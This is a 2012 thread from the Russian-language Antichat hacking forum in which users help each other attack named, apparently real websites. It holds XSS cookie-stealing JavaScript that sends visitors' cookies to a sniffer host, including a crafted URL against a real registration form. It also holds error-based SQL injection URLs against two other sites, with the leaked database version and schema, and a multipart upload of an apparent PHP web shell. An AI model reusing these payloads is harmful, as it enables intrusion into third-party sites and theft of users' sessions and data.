ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.02.2012, 16:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
28040
Репутация:
13
|
|
Здараствуйте, подскажите пожалуйста.. Нашел
http://vsetke.ru/registration/registration_form.jsp
xss При вставке в поля имя и пароль
">alert(/xss/)
Подскажи как можно вытащить куки ?
|
|
|
|
03.02.2012, 16:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
5709
Репутация:
0
|
|
Сообщение от None
http://www.poezia.ru/article.php?sid=65755+union+select+1--
Количество столбцов 1, но почему ошибку все равно выдает ?
|
|
|
|
03.02.2012, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
Сообщение от bodrich
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?
попробуй вывод в ошибке, там походу нет вывода столбцов вот так крути
http://www.poezia.ru/article.php?sid=65755+and(select+count(*)+from+inf ormation_schema.tables+group+by(concat(version(),0 x00,floor(rand(0)*2))))--+
|
|
|
|
03.02.2012, 16:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от bodrich
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?
Код:
Code:
http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+count(*),concat((select+version()),0x00,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry '5.0.27' for key 1
Код:
Code:
http://www.poezia.ru/article.php?sid=65755+and(select+1+from(select+count(*),concat((select+concat(table_name,0x3a,column_name,0x00)+from+information_schema.columns+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Код:
Code:
Duplicate entry 'CHARACTER_SETS:CHARACTER_SET_NAME' for key 1
|
|
|
|
03.02.2012, 16:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от pirat0
pirat0 said:
">javascript:src=http://'sniffer.com?'+document.cookie;"
как-то так вроде помнится))
Код:
Code:
img = new Image(); img.src = "http://sniffer?"+document.cookie;
location.href = "http://sniffer?" + document.cookie;
|
|
|
|
03.02.2012, 16:43
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]">(new Image()).src='http://site.com/sniffer.php?'+document.cookie[/COLOR][/COLOR]
Можно отправлять GET-запросом
Сообщение от None
http://vsetke.ru/registration/registration_form.jsp?email_address=">(new Image()).src='http://site.com/sniffer.php?'%2bdocument.cookie
Вставляешь на свой сайт скрытый фрейм
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"](new Image()).src='http://site.com/sniffer.php?'+document.cookie"[/COLOR][COLOR="#007700"]>[/COLOR][/COLOR]
Когда юзер зайдет на сайт, куки отправятся на сниффер. В IE и хроме этот вариант не сработает из-за фильтров.
p.s.:
В этом примере используется GET-запрос, потому что реализация атаки проще. Но если есть возможность, лучше использовать POST-запрос для эксплуатации XSS. |
|
|
03.02.2012, 16:46
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от bodrich
bodrich said:
Количество столбцов 1, но почему ошибку все равно выдает ?
Потому что несколько запросов к базе. В первом один столбец, во втором больше.
|
|
|
|
03.02.2012, 17:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
что можно сделать в подобном случае?
Сообщение от None
http://www.bluegrassmidwest.com/details.php?id=2+or+1+group+by+concat%28%28select+ version%28%29%29,floor%28rand%280%29*2%29%29having +min%280%29+or+1--+
ответ
error setting cookie |
|
|
|
03.02.2012, 18:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
[CODE]
Code:
POSTDATA =-----------------------------114782935826962
Content-Disposition: form-data; name="f[id]"
-----------------------------114782935826962
Content-Disposition: form-data; name="f[galery_id]"
1565
-----------------------------114782935826962
Content-Disposition: form-data; name="f[order_id]"
-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ru]"
-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_en]"
-----------------------------114782935826962
Content-Disposition: form-data; name="f[title_ua]"
-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_small]"; filename=""
Content-Type: application/octet-stream
-----------------------------114782935826962
Content-Disposition: form-data; name="f[img_big]"; filename="d00m.php"
Content-Type: unknown/unknown
|
|
|
|
03.02.2012, 19:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
Сообщение от qaz
qaz said:
что можно сделать в подобном случае?
ответ
error setting cookie
http://www.bluegrassmidwest.com/details.php?id=6'and(0)/*--*/order/*--*/by/*--*/10/*)
вот столбцы можно подобрать, но потом как только вставляеш в запрос union все валится, походу какой то фильтр, UNiOn такого типа тоже не канает((, может еще у кого какие идеи будут??
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
